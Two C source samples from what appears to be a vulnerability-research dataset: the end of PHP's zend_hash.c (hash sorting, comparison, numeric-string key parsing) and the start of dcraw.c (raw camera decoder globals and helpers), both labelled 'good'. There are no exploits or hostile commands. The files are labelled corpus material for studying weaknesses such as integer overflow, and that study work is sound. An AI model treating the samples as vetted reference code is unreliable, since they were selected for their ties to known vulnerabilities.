ZEND_API int ZEND_FASTCALL zend_hash_get_current_key_type_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx != HT_INVALID_IDX) {
p = ht->arData + idx;
if (p->key) {
return HASH_KEY_IS_STRING;
} else {
return HASH_KEY_IS_LONG;
}
}
return HASH_KEY_NON_EXISTENT;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_get_current_data_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx != HT_INVALID_IDX) {
p = ht->arData + idx;
return &p->val;
} else {
return NULL;
}
}
ZEND_API void zend_hash_bucket_swap(Bucket *p, Bucket *q)
{
zval val;
zend_ulong h;
zend_string *key;
ZVAL_COPY_VALUE(&val, &p->val);
h = p->h;
key = p->key;
ZVAL_COPY_VALUE(&p->val, &q->val);
p->h = q->h;
p->key = q->key;
ZVAL_COPY_VALUE(&q->val, &val);
q->h = h;
q->key = key;
}
ZEND_API void zend_hash_bucket_renum_swap(Bucket *p, Bucket *q)
{
zval val;
ZVAL_COPY_VALUE(&val, &p->val);
ZVAL_COPY_VALUE(&p->val, &q->val);
ZVAL_COPY_VALUE(&q->val, &val);
}
ZEND_API void zend_hash_bucket_packed_swap(Bucket *p, Bucket *q)
{
zval val;
zend_ulong h;
ZVAL_COPY_VALUE(&val, &p->val);
h = p->h;
ZVAL_COPY_VALUE(&p->val, &q->val);
p->h = q->h;
ZVAL_COPY_VALUE(&q->val, &val);
q->h = h;
}
ZEND_API int ZEND_FASTCALL zend_hash_sort_ex(HashTable *ht, sort_func_t sort, compare_func_t compar, zend_bool renumber)
{
Bucket *p;
uint32_t i, j;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (!(ht->nNumOfElements>1) && !(renumber && ht->nNumOfElements>0)) { /* Doesn't require sorting */
return SUCCESS;
}
if (ht->nNumUsed == ht->nNumOfElements) {
i = ht->nNumUsed;
} else {
for (j = 0, i = 0; j < ht->nNumUsed; j++) {
p = ht->arData + j;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (i != j) {
ht->arData[i] = *p;
}
i++;
}
}
sort((void *)ht->arData, i, sizeof(Bucket), compar,
(swap_func_t)(renumber? zend_hash_bucket_renum_swap :
((ht->u.flags & HASH_FLAG_PACKED) ? zend_hash_bucket_packed_swap : zend_hash_bucket_swap)));
HANDLE_BLOCK_INTERRUPTIONS();
ht->nNumUsed = i;
ht->nInternalPointer = 0;
if (renumber) {
for (j = 0; j < i; j++) {
p = ht->arData + j;
p->h = j;
if (p->key) {
zend_string_release(p->key);
p->key = NULL;
}
}
ht->nNextFreeElement = i;
}
if (ht->u.flags & HASH_FLAG_PACKED) {
if (!renumber) {
zend_hash_packed_to_hash(ht);
}
} else {
if (renumber) {
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
new_data = pemalloc(HT_SIZE_EX(ht->nTableSize, HT_MIN_MASK), (ht->u.flags & HASH_FLAG_PERSISTENT));
ht->u.flags |= HASH_FLAG_PACKED | HASH_FLAG_STATIC_KEYS;
ht->nTableMask = HT_MIN_MASK;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
			pefree(old_data, ht->u.flags & HASH_FLAG_PERSISTENT);
HT_HASH_RESET_PACKED(ht);
} else {
zend_hash_rehash(ht);
}
}
HANDLE_UNBLOCK_INTERRUPTIONS();
return SUCCESS;
}
static zend_always_inline int zend_hash_compare_impl(HashTable *ht1, HashTable *ht2, compare_func_t compar, zend_bool ordered) {
uint32_t idx1, idx2;
if (ht1->nNumOfElements != ht2->nNumOfElements) {
return ht1->nNumOfElements > ht2->nNumOfElements ? 1 : -1;
}
for (idx1 = 0, idx2 = 0; idx1 < ht1->nNumUsed; idx1++) {
Bucket *p1 = ht1->arData + idx1, *p2;
zval *pData1, *pData2;
int result;
if (Z_TYPE(p1->val) == IS_UNDEF) continue;
if (ordered) {
while (1) {
ZEND_ASSERT(idx2 != ht2->nNumUsed);
p2 = ht2->arData + idx2;
if (Z_TYPE(p2->val) != IS_UNDEF) break;
idx2++;
}
if (p1->key == NULL && p2->key == NULL) { /* numeric indices */
if (p1->h != p2->h) {
return p1->h > p2->h ? 1 : -1;
}
} else if (p1->key != NULL && p2->key != NULL) { /* string indices */
if (ZSTR_LEN(p1->key) != ZSTR_LEN(p2->key)) {
return ZSTR_LEN(p1->key) > ZSTR_LEN(p2->key) ? 1 : -1;
}
result = memcmp(ZSTR_VAL(p1->key), ZSTR_VAL(p2->key), ZSTR_LEN(p1->key));
if (result != 0) {
return result;
}
} else {
				/* Mixed key types: A string key is considered larger */
return p1->key != NULL ? 1 : -1;
}
pData2 = &p2->val;
idx2++;
} else {
if (p1->key == NULL) { /* numeric index */
pData2 = zend_hash_index_find(ht2, p1->h);
if (pData2 == NULL) {
return 1;
}
} else { /* string index */
pData2 = zend_hash_find(ht2, p1->key);
if (pData2 == NULL) {
return 1;
}
}
}
pData1 = &p1->val;
if (Z_TYPE_P(pData1) == IS_INDIRECT) {
pData1 = Z_INDIRECT_P(pData1);
}
if (Z_TYPE_P(pData2) == IS_INDIRECT) {
pData2 = Z_INDIRECT_P(pData2);
}
if (Z_TYPE_P(pData1) == IS_UNDEF) {
if (Z_TYPE_P(pData2) != IS_UNDEF) {
return -1;
}
} else if (Z_TYPE_P(pData2) == IS_UNDEF) {
return 1;
} else {
result = compar(pData1, pData2);
if (result != 0) {
return result;
}
}
}
return 0;
}
ZEND_API int zend_hash_compare(HashTable *ht1, HashTable *ht2, compare_func_t compar, zend_bool ordered)
{
int result;
IS_CONSISTENT(ht1);
IS_CONSISTENT(ht2);
HASH_PROTECT_RECURSION(ht1);
HASH_PROTECT_RECURSION(ht2);
result = zend_hash_compare_impl(ht1, ht2, compar, ordered);
HASH_UNPROTECT_RECURSION(ht1);
HASH_UNPROTECT_RECURSION(ht2);
return result;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_minmax(const HashTable *ht, compare_func_t compar, uint32_t flag)
{
uint32_t idx;
Bucket *p, *res;
IS_CONSISTENT(ht);
if (ht->nNumOfElements == 0 ) {
return NULL;
}
idx = 0;
while (1) {
if (idx == ht->nNumUsed) {
return NULL;
}
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) break;
idx++;
}
res = ht->arData + idx;
for (; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (flag) {
if (compar(res, p) < 0) { /* max */
res = p;
}
} else {
if (compar(res, p) > 0) { /* min */
res = p;
}
}
}
return &res->val;
}
ZEND_API int ZEND_FASTCALL _zend_handle_numeric_str_ex(const char *key, size_t length, zend_ulong *idx)
{
register const char *tmp = key;
const char *end = key + length;
if (*tmp == '-') {
tmp++;
}
if ((*tmp == '0' && length > 1) /* numbers with leading zeros */
|| (end - tmp > MAX_LENGTH_OF_LONG - 1) /* number too long */
|| (SIZEOF_ZEND_LONG == 4 &&
end - tmp == MAX_LENGTH_OF_LONG - 1 &&
*tmp > '2')) { /* overflow */
return 0;
}
*idx = (*tmp - '0');
while (1) {
++tmp;
if (tmp == end) {
if (*key == '-') {
if (*idx-1 > ZEND_LONG_MAX) { /* overflow */
return 0;
}
*idx = 0 - *idx;
} else if (*idx > ZEND_LONG_MAX) { /* overflow */
return 0;
}
return 1;
}
if (*tmp <= '9' && *tmp >= '0') {
*idx = (*idx * 10) + (*tmp - '0');
} else {
return 0;
}
}
}
/*
* Local variables:
* tab-width: 4
* c-basic-offset: 4
* indent-tabs-mode: t
* End:
*/
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3089_0 |
crossvul-cpp_data_good_582_0 | #ifndef IGNOREALL
/*
dcraw.c -- Dave Coffin's raw photo decoder
Copyright 1997-2015 by Dave Coffin, dcoffin a cybercom o net
This is a command-line ANSI C program to convert raw photos from
any digital camera on any computer running any operating system.
No license is required to download and use dcraw.c. However,
to lawfully redistribute dcraw, you must either (a) offer, at
no extra charge, full source code* for all executable files
containing RESTRICTED functions, (b) distribute this code under
the GPL Version 2 or later, (c) remove all RESTRICTED functions,
re-implement them, or copy them from an earlier, unrestricted
Revision of dcraw.c, or (d) purchase a license from the author.
The functions that process Foveon images have been RESTRICTED
since Revision 1.237. All other code remains free for all uses.
*If you have not modified dcraw.c in any way, a link to my
homepage qualifies as "full source code".
$Revision: 1.476 $
$Date: 2015/05/25 02:29:14 $
*/
/*@out DEFINES
#ifndef USE_JPEG
#define NO_JPEG
#endif
#ifndef USE_JASPER
#define NO_JASPER
#endif
@end DEFINES */
#define NO_LCMS
#define DCRAW_VERBOSE
//@out DEFINES
#define DCRAW_VERSION "9.26"
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#define _USE_MATH_DEFINES
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <float.h>
#include <limits.h>
#include <math.h>
#include <setjmp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
//@end DEFINES
#if defined(DJGPP) || defined(__MINGW32__)
#define fseeko fseek
#define ftello ftell
#else
#define fgetc getc_unlocked
#endif
//@out DEFINES
#ifdef __CYGWIN__
#include <io.h>
#endif
#if defined WIN32 || defined (__MINGW32__)
#include <sys/utime.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define snprintf _snprintf
#define strcasecmp stricmp
#define strncasecmp strnicmp
//@end DEFINES
typedef __int64 INT64;
typedef unsigned __int64 UINT64;
//@out DEFINES
#else
#include <unistd.h>
#include <utime.h>
#include <netinet/in.h>
typedef long long INT64;
typedef unsigned long long UINT64;
#endif
#ifdef NODEPS
#define NO_JASPER
#define NO_JPEG
#define NO_LCMS
#endif
#ifndef NO_JASPER
#include <jasper/jasper.h> /* Decode Red camera movies */
#endif
#ifndef NO_JPEG
#include <jpeglib.h> /* Decode compressed Kodak DC120 photos */
#endif /* and Adobe Lossy DNGs */
#ifndef NO_LCMS
#ifdef USE_LCMS
#include <lcms.h> /* Support color profiles */
#else
#include <lcms2.h> /* Support color profiles */
#endif
#endif
#ifdef LOCALEDIR
#include <libintl.h>
#define _(String) gettext(String)
#else
#define _(String) (String)
#endif
#ifdef LJPEG_DECODE
#error Please compile dcraw.c by itself.
#error Do not link it with ljpeg_decode.
#endif
#ifndef LONG_BIT
#define LONG_BIT (8 * sizeof (long))
#endif
//@end DEFINES
#if !defined(uchar)
#define uchar unsigned char
#endif
#if !defined(ushort)
#define ushort unsigned short
#endif
/*
All global variables are defined here, and all functions that
access them are prefixed with "CLASS". Note that a thread-safe
C++ class cannot have non-const static local variables.
*/
FILE *ifp, *ofp;
short order;
const char *ifname;
char *meta_data, xtrans[6][6], xtrans_abs[6][6];
char cdesc[5], desc[512], make[64], model[64], model2[64], artist[64],software[64];
float flash_used, canon_ev, iso_speed, shutter, aperture, focal_len;
time_t timestamp;
off_t strip_offset, data_offset;
off_t thumb_offset, meta_offset, profile_offset;
unsigned shot_order, kodak_cbpp, exif_cfa, unique_id;
unsigned thumb_length, meta_length, profile_length;
unsigned thumb_misc, *oprof, fuji_layout, shot_select=0, multi_out=0;
unsigned tiff_nifds, tiff_samples, tiff_bps, tiff_compress;
unsigned black, maximum, mix_green, raw_color, zero_is_bad;
unsigned zero_after_ff, is_raw, dng_version, is_foveon, data_error;
unsigned tile_width, tile_length, gpsdata[32], load_flags;
unsigned flip, tiff_flip, filters, colors;
ushort raw_height, raw_width, height, width, top_margin, left_margin;
ushort shrink, iheight, iwidth, fuji_width, thumb_width, thumb_height;
ushort *raw_image, (*image)[4], cblack[4102];
ushort white[8][8], curve[0x10000], cr2_slice[3], sraw_mul[4];
double pixel_aspect, aber[4]={1,1,1,1}, gamm[6]={ 0.45,4.5,0,0,0,0 };
float bright=1, user_mul[4]={0,0,0,0}, threshold=0;
int mask[8][4];
int half_size=0, four_color_rgb=0, document_mode=0, highlight=0;
int verbose=0, use_auto_wb=0, use_camera_wb=0, use_camera_matrix=1;
int output_color=1, output_bps=8, output_tiff=0, med_passes=0;
int no_auto_bright=0;
unsigned greybox[4] = { 0, 0, UINT_MAX, UINT_MAX };
float cam_mul[4], pre_mul[4], cmatrix[3][4], rgb_cam[3][4];
const double xyz_rgb[3][3] = { /* XYZ from RGB */
{ 0.412453, 0.357580, 0.180423 },
{ 0.212671, 0.715160, 0.072169 },
{ 0.019334, 0.119193, 0.950227 } };
const float d65_white[3] = { 0.950456, 1, 1.088754 };
int histogram[4][0x2000];
void (*write_thumb)(), (*write_fun)();
void (*load_raw)(), (*thumb_load_raw)();
jmp_buf failure;
struct decode {
struct decode *branch[2];
int leaf;
} first_decode[2048], *second_decode, *free_decode;
struct tiff_ifd {
int t_width, t_height, bps, comp, phint, offset, t_flip, samples, bytes;
int t_tile_width, t_tile_length,sample_format,predictor;
float t_shutter;
} tiff_ifd[10];
struct ph1 {
int format, key_off, tag_21a;
int t_black, split_col, black_col, split_row, black_row;
float tag_210;
} ph1;
#define CLASS
//@out DEFINES
#define FORC(cnt) for (c=0; c < cnt; c++)
#define FORC3 FORC(3)
#define FORC4 FORC(4)
#define FORCC for (c=0; c < colors && c < 4; c++)
#define SQR(x) ((x)*(x))
#define ABS(x) (((int)(x) ^ ((int)(x) >> 31)) - ((int)(x) >> 31))
#define MIN(a,b) ((a) < (b) ? (a) : (b))
#define MAX(a,b) ((a) > (b) ? (a) : (b))
#define LIM(x,min,max) MAX(min,MIN(x,max))
#define ULIM(x,y,z) ((y) < (z) ? LIM(x,y,z) : LIM(x,z,y))
#define CLIP(x) LIM((int)(x),0,65535)
#define SWAP(a,b) { a=a+b; b=a-b; a=a-b; }
#define my_swap(type, i, j) {type t = i; i = j; j = t;}
static float fMAX(float a, float b)
{
return MAX(a,b);
}
/*
In order to inline this calculation, I make the risky
assumption that all filter patterns can be described
by a repeating pattern of eight rows and two columns
Do not use the FC or BAYER macros with the Leaf CatchLight,
because its pattern is 16x16, not 2x8.
Return values are either 0/1/2/3 = G/M/C/Y or 0/1/2/3 = R/G1/B/G2
PowerShot 600 PowerShot A50 PowerShot Pro70 Pro90 & G1
0xe1e4e1e4: 0x1b4e4b1e: 0x1e4b4e1b: 0xb4b4b4b4:
0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5
0 G M G M G M 0 C Y C Y C Y 0 Y C Y C Y C 0 G M G M G M
1 C Y C Y C Y 1 M G M G M G 1 M G M G M G 1 Y C Y C Y C
2 M G M G M G 2 Y C Y C Y C 2 C Y C Y C Y
3 C Y C Y C Y 3 G M G M G M 3 G M G M G M
4 C Y C Y C Y 4 Y C Y C Y C
PowerShot A5 5 G M G M G M 5 G M G M G M
0x1e4e1e4e: 6 Y C Y C Y C 6 C Y C Y C Y
7 M G M G M G 7 M G M G M G
0 1 2 3 4 5
0 C Y C Y C Y
1 G M G M G M
2 C Y C Y C Y
3 M G M G M G
All RGB cameras use one of these Bayer grids:
0x16161616: 0x61616161: 0x49494949: 0x94949494:
0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5
0 B G B G B G 0 G R G R G R 0 G B G B G B 0 R G R G R G
1 G R G R G R 1 B G B G B G 1 R G R G R G 1 G B G B G B
2 B G B G B G 2 G R G R G R 2 G B G B G B 2 R G R G R G
3 G R G R G R 3 B G B G B G 3 R G R G R G 3 G B G B G B
*/
#define RAWINDEX(row, col) ((row)*raw_width + (col))
#define RAW(row,col) \
raw_image[(row)*raw_width+(col)]
//@end DEFINES
#define FC(row,col) \
(filters >> ((((row) << 1 & 14) + ((col) & 1)) << 1) & 3)
//@out DEFINES
#define BAYER(row,col) \
image[((row) >> shrink)*iwidth + ((col) >> shrink)][FC(row,col)]
#define BAYER2(row,col) \
image[((row) >> shrink)*iwidth + ((col) >> shrink)][fcol(row,col)]
//@end DEFINES
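/* Illustrative note (not in the original source): for the common RGGB grid
 * filters == 0x94949494 the FC macro above evaluates to
 *   FC(0,0) = 0 (R)   FC(0,1) = 1 (G)
 *   FC(1,0) = 1 (G)   FC(1,1) = 2 (B)
 * i.e. each 2-bit field of `filters` holds the color index of one cell in
 * the repeating 8x2 pattern documented in the table above.
 */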
/* @out COMMON
#include <math.h>
#define CLASS LibRaw::
#include "libraw/libraw_types.h"
#define LIBRAW_LIBRARY_BUILD
#define LIBRAW_IO_REDEFINED
#include "libraw/libraw.h"
#include "internal/defines.h"
#include "internal/var_defines.h"
@end COMMON */
//@out COMMON
int CLASS fcol (int row, int col)
{
static const char filter[16][16] =
{ { 2,1,1,3,2,3,2,0,3,2,3,0,1,2,1,0 },
{ 0,3,0,2,0,1,3,1,0,1,1,2,0,3,3,2 },
{ 2,3,3,2,3,1,1,3,3,1,2,1,2,0,0,3 },
{ 0,1,0,1,0,2,0,2,2,0,3,0,1,3,2,1 },
{ 3,1,1,2,0,1,0,2,1,3,1,3,0,1,3,0 },
{ 2,0,0,3,3,2,3,1,2,0,2,0,3,2,2,1 },
{ 2,3,3,1,2,1,2,1,2,1,1,2,3,0,0,1 },
{ 1,0,0,2,3,0,0,3,0,3,0,3,2,1,2,3 },
{ 2,3,3,1,1,2,1,0,3,2,3,0,2,3,1,3 },
{ 1,0,2,0,3,0,3,2,0,1,1,2,0,1,0,2 },
{ 0,1,1,3,3,2,2,1,1,3,3,0,2,1,3,2 },
{ 2,3,2,0,0,1,3,0,2,0,1,2,3,0,1,0 },
{ 1,3,1,2,3,2,3,2,0,2,0,1,1,0,3,0 },
{ 0,2,0,3,1,0,0,1,1,3,3,2,3,2,2,1 },
{ 2,1,3,2,3,1,2,1,0,3,0,2,0,2,0,2 },
{ 0,3,1,0,0,2,0,3,2,1,3,1,1,3,1,3 } };
if (filters == 1) return filter[(row+top_margin)&15][(col+left_margin)&15];
if (filters == 9) return xtrans[(row+6) % 6][(col+6) % 6];
return FC(row,col);
}
static size_t local_strnlen(const char *s, size_t n)
{
const char *p = (const char *)memchr(s, 0, n);
return(p ? p-s : n);
}
/* add OS X version check here ?? */
#define strnlen(a,b) local_strnlen(a,b)
#ifdef LIBRAW_LIBRARY_BUILD
static int stread(char *buf, size_t len, LibRaw_abstract_datastream *fp)
{
int r = fp->read(buf,len,1);
buf[len-1] = 0;
return r;
}
#define stmread(buf,maxlen,fp) stread(buf,MIN(maxlen,sizeof(buf)),fp)
#endif
#ifndef __GLIBC__
char *my_memmem (char *haystack, size_t haystacklen,
char *needle, size_t needlelen)
{
char *c;
for (c = haystack; c <= haystack + haystacklen - needlelen; c++)
if (!memcmp (c, needle, needlelen))
return c;
return 0;
}
#define memmem my_memmem
char *my_strcasestr (char *haystack, const char *needle)
{
char *c;
for (c = haystack; *c; c++)
if (!strncasecmp(c, needle, strlen(needle)))
return c;
return 0;
}
#define strcasestr my_strcasestr
#endif
#define strbuflen(buf) strnlen(buf,sizeof(buf)-1)
//@end COMMON
void CLASS merror (void *ptr, const char *where)
{
if (ptr) return;
fprintf (stderr,_("%s: Out of memory in %s\n"), ifname, where);
longjmp (failure, 1);
}
void CLASS derror()
{
if (!data_error) {
fprintf (stderr, "%s: ", ifname);
if (feof(ifp))
fprintf (stderr,_("Unexpected end of file\n"));
else
fprintf (stderr,_("Corrupt data near 0x%llx\n"), (INT64) ftello(ifp));
}
data_error++;
}
//@out COMMON
ushort CLASS sget2 (uchar *s)
{
if (order == 0x4949) /* "II" means little-endian */
return s[0] | s[1] << 8;
else /* "MM" means big-endian */
return s[0] << 8 | s[1];
}
// DNG was written by:
#define CameraDNG 1
#define AdobeDNG 2
#ifdef LIBRAW_LIBRARY_BUILD
static int getwords(char *line, char *words[], int maxwords,int maxlen)
{
line[maxlen-1] = 0;
char *p = line;
int nwords = 0;
while(1)
{
while(isspace(*p)) p++;
if(*p == '\0') return nwords;
words[nwords++] = p;
while(!isspace(*p) && *p != '\0') p++;
if(*p == '\0') return nwords;
*p++ = '\0';
if(nwords >= maxwords) return nwords;
}
}
static ushort saneSonyCameraInfo(uchar a, uchar b, uchar c, uchar d, uchar e, uchar f){
if ((a >> 4) > 9) return 0;
else if ((a & 0x0f) > 9) return 0;
else if ((b >> 4) > 9) return 0;
else if ((b & 0x0f) > 9) return 0;
else if ((c >> 4) > 9) return 0;
else if ((c & 0x0f) > 9) return 0;
else if ((d >> 4) > 9) return 0;
else if ((d & 0x0f) > 9) return 0;
else if ((e >> 4) > 9) return 0;
else if ((e & 0x0f) > 9) return 0;
else if ((f >> 4) > 9) return 0;
else if ((f & 0x0f) > 9) return 0;
return 1;
}
static ushort bcd2dec(uchar data){
if ((data >> 4) > 9) return 0;
else if ((data & 0x0f) > 9) return 0;
else return (data >> 4) * 10 + (data & 0x0f);
}
static uchar SonySubstitution[257] = "\x00\x01\x32\xb1\x0a\x0e\x87\x28\x02\xcc\xca\xad\x1b\xdc\x08\xed\x64\x86\xf0\x4f\x8c\x6c\xb8\xcb\x69\xc4\x2c\x03\x97\xb6\x93\x7c\x14\xf3\xe2\x3e\x30\x8e\xd7\x60\x1c\xa1\xab\x37\xec\x75\xbe\x23\x15\x6a\x59\x3f\xd0\xb9\x96\xb5\x50\x27\x88\xe3\x81\x94\xe0\xc0\x04\x5c\xc6\xe8\x5f\x4b\x70\x38\x9f\x82\x80\x51\x2b\xc5\x45\x49\x9b\x21\x52\x53\x54\x85\x0b\x5d\x61\xda\x7b\x55\x26\x24\x07\x6e\x36\x5b\x47\xb7\xd9\x4a\xa2\xdf\xbf\x12\x25\xbc\x1e\x7f\x56\xea\x10\xe6\xcf\x67\x4d\x3c\x91\x83\xe1\x31\xb3\x6f\xf4\x05\x8a\x46\xc8\x18\x76\x68\xbd\xac\x92\x2a\x13\xe9\x0f\xa3\x7a\xdb\x3d\xd4\xe7\x3a\x1a\x57\xaf\x20\x42\xb2\x9e\xc3\x8b\xf2\xd5\xd3\xa4\x7e\x1f\x98\x9c\xee\x74\xa5\xa6\xa7\xd8\x5e\xb0\xb4\x34\xce\xa8\x79\x77\x5a\xc1\x89\xae\x9a\x11\x33\x9d\xf5\x39\x19\x65\x78\x16\x71\xd2\xa9\x44\x63\x40\x29\xba\xa0\x8f\xe4\xd6\x3b\x84\x0d\xc2\x4e\x58\xdd\x99\x22\x6b\xc9\xbb\x17\x06\xe5\x7d\x66\x43\x62\xf6\xcd\x35\x90\x2e\x41\x8d\x6d\xaa\x09\x73\x95\x0c\xf1\x1d\xde\x4c\x2f\x2d\xf7\xd1\x72\xeb\xef\x48\xc7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff";
ushort CLASS sget2Rev(uchar *s) // specific to some Canon Makernotes fields, where they have endian in reverse
{
if (order == 0x4d4d) /* "II" means little-endian, and we reverse to "MM" - big endian */
return s[0] | s[1] << 8;
else /* "MM" means big-endian... */
return s[0] << 8 | s[1];
}
#endif
ushort CLASS get2()
{
uchar str[2] = { 0xff,0xff };
fread (str, 1, 2, ifp);
return sget2(str);
}
unsigned CLASS sget4 (uchar *s)
{
if (order == 0x4949)
return s[0] | s[1] << 8 | s[2] << 16 | s[3] << 24;
else
return s[0] << 24 | s[1] << 16 | s[2] << 8 | s[3];
}
#define sget4(s) sget4((uchar *)s)
unsigned CLASS get4()
{
uchar str[4] = { 0xff,0xff,0xff,0xff };
fread (str, 1, 4, ifp);
return sget4(str);
}
unsigned CLASS getint (int type)
{
return type == 3 ? get2() : get4();
}
float CLASS int_to_float (int i)
{
union { int i; float f; } u;
u.i = i;
return u.f;
}
double CLASS getreal (int type)
{
union { char c[8]; double d; } u,v;
int i, rev;
switch (type) {
case 3: return (unsigned short) get2();
case 4: return (unsigned int) get4();
case 5:
u.d = (unsigned int) get4();
v.d = (unsigned int)get4();
return u.d / (v.d ? v.d : 1);
case 8: return (signed short) get2();
case 9: return (signed int) get4();
case 10:
u.d = (signed int) get4();
v.d = (signed int)get4();
return u.d / (v.d?v.d:1);
case 11: return int_to_float (get4());
case 12:
rev = 7 * ((order == 0x4949) == (ntohs(0x1234) == 0x1234));
for (i=0; i < 8; i++)
u.c[i ^ rev] = fgetc(ifp);
return u.d;
default: return fgetc(ifp);
}
}
void CLASS read_shorts (ushort *pixel, unsigned count)
{
if (fread (pixel, 2, count, ifp) < count) derror();
if ((order == 0x4949) == (ntohs(0x1234) == 0x1234))
swab ((char*)pixel, (char*)pixel, count*2);
}
void CLASS cubic_spline (const int *x_, const int *y_, const int len)
{
float **A, *b, *c, *d, *x, *y;
int i, j;
A = (float **) calloc (((2*len + 4)*sizeof **A + sizeof *A), 2*len);
if (!A) return;
A[0] = (float *) (A + 2*len);
for (i = 1; i < 2*len; i++)
A[i] = A[0] + 2*len*i;
y = len + (x = i + (d = i + (c = i + (b = A[0] + i*i))));
for (i = 0; i < len; i++) {
x[i] = x_[i] / 65535.0;
y[i] = y_[i] / 65535.0;
}
for (i = len-1; i > 0; i--) {
b[i] = (y[i] - y[i-1]) / (x[i] - x[i-1]);
d[i-1] = x[i] - x[i-1];
}
for (i = 1; i < len-1; i++) {
A[i][i] = 2 * (d[i-1] + d[i]);
if (i > 1) {
A[i][i-1] = d[i-1];
A[i-1][i] = d[i-1];
}
A[i][len-1] = 6 * (b[i+1] - b[i]);
}
for(i = 1; i < len-2; i++) {
float v = A[i+1][i] / A[i][i];
for(j = 1; j <= len-1; j++)
A[i+1][j] -= v * A[i][j];
}
for(i = len-2; i > 0; i--) {
float acc = 0;
for(j = i; j <= len-2; j++)
acc += A[i][j]*c[j];
c[i] = (A[i][len-1] - acc) / A[i][i];
}
for (i = 0; i < 0x10000; i++) {
float x_out = (float)(i / 65535.0);
float y_out = 0;
for (j = 0; j < len-1; j++) {
if (x[j] <= x_out && x_out <= x[j+1]) {
float v = x_out - x[j];
y_out = y[j] +
((y[j+1] - y[j]) / d[j] - (2 * d[j] * c[j] + c[j+1] * d[j])/6) * v
+ (c[j] * 0.5) * v*v + ((c[j+1] - c[j]) / (6 * d[j])) * v*v*v;
}
}
curve[i] = y_out < 0.0 ? 0 : (y_out >= 1.0 ? 65535 :
(ushort)(y_out * 65535.0 + 0.5));
}
free (A);
}
void CLASS canon_600_fixed_wb (int temp)
{
static const short mul[4][5] = {
{ 667, 358,397,565,452 },
{ 731, 390,367,499,517 },
{ 1119, 396,348,448,537 },
{ 1399, 485,431,508,688 } };
int lo, hi, i;
float frac=0;
for (lo=4; --lo; )
if (*mul[lo] <= temp) break;
for (hi=0; hi < 3; hi++)
if (*mul[hi] >= temp) break;
if (lo != hi)
frac = (float) (temp - *mul[lo]) / (*mul[hi] - *mul[lo]);
for (i=1; i < 5; i++)
pre_mul[i-1] = 1 / (frac * mul[hi][i] + (1-frac) * mul[lo][i]);
}
/* Return values: 0 = white 1 = near white 2 = not white */
int CLASS canon_600_color (int ratio[2], int mar)
{
int clipped=0, target, miss;
if (flash_used) {
if (ratio[1] < -104)
{ ratio[1] = -104; clipped = 1; }
if (ratio[1] > 12)
{ ratio[1] = 12; clipped = 1; }
} else {
if (ratio[1] < -264 || ratio[1] > 461) return 2;
if (ratio[1] < -50)
{ ratio[1] = -50; clipped = 1; }
if (ratio[1] > 307)
{ ratio[1] = 307; clipped = 1; }
}
target = flash_used || ratio[1] < 197
? -38 - (398 * ratio[1] >> 10)
: -123 + (48 * ratio[1] >> 10);
if (target - mar <= ratio[0] &&
target + 20 >= ratio[0] && !clipped) return 0;
miss = target - ratio[0];
if (abs(miss) >= mar*4) return 2;
if (miss < -20) miss = -20;
if (miss > mar) miss = mar;
ratio[0] = target - miss;
return 1;
}
void CLASS canon_600_auto_wb()
{
int mar, row, col, i, j, st, count[] = { 0,0 };
int test[8], total[2][8], ratio[2][2], stat[2];
memset (&total, 0, sizeof total);
i = canon_ev + 0.5;
if (i < 10) mar = 150;
else if (i > 12) mar = 20;
else mar = 280 - 20 * i;
if (flash_used) mar = 80;
for (row=14; row < height-14; row+=4)
for (col=10; col < width; col+=2) {
for (i=0; i < 8; i++)
test[(i & 4) + FC(row+(i >> 1),col+(i & 1))] =
BAYER(row+(i >> 1),col+(i & 1));
for (i=0; i < 8; i++)
if (test[i] < 150 || test[i] > 1500) goto next;
for (i=0; i < 4; i++)
if (abs(test[i] - test[i+4]) > 50) goto next;
for (i=0; i < 2; i++) {
for (j=0; j < 4; j+=2)
ratio[i][j >> 1] = ((test[i*4+j+1]-test[i*4+j]) << 10) / test[i*4+j];
stat[i] = canon_600_color (ratio[i], mar);
}
if ((st = stat[0] | stat[1]) > 1) goto next;
for (i=0; i < 2; i++)
if (stat[i])
for (j=0; j < 2; j++)
test[i*4+j*2+1] = test[i*4+j*2] * (0x400 + ratio[i][j]) >> 10;
for (i=0; i < 8; i++)
total[st][i] += test[i];
count[st]++;
next: ;
}
if (count[0] | count[1]) {
st = count[0]*200 < count[1];
for (i=0; i < 4; i++)
pre_mul[i] = 1.0 / (total[st][i] + total[st][i+4]);
}
}
void CLASS canon_600_coeff()
{
static const short table[6][12] = {
{ -190,702,-1878,2390, 1861,-1349,905,-393, -432,944,2617,-2105 },
{ -1203,1715,-1136,1648, 1388,-876,267,245, -1641,2153,3921,-3409 },
{ -615,1127,-1563,2075, 1437,-925,509,3, -756,1268,2519,-2007 },
{ -190,702,-1886,2398, 2153,-1641,763,-251, -452,964,3040,-2528 },
{ -190,702,-1878,2390, 1861,-1349,905,-393, -432,944,2617,-2105 },
{ -807,1319,-1785,2297, 1388,-876,769,-257, -230,742,2067,-1555 } };
int t=0, i, c;
float mc, yc;
mc = pre_mul[1] / pre_mul[2];
yc = pre_mul[3] / pre_mul[2];
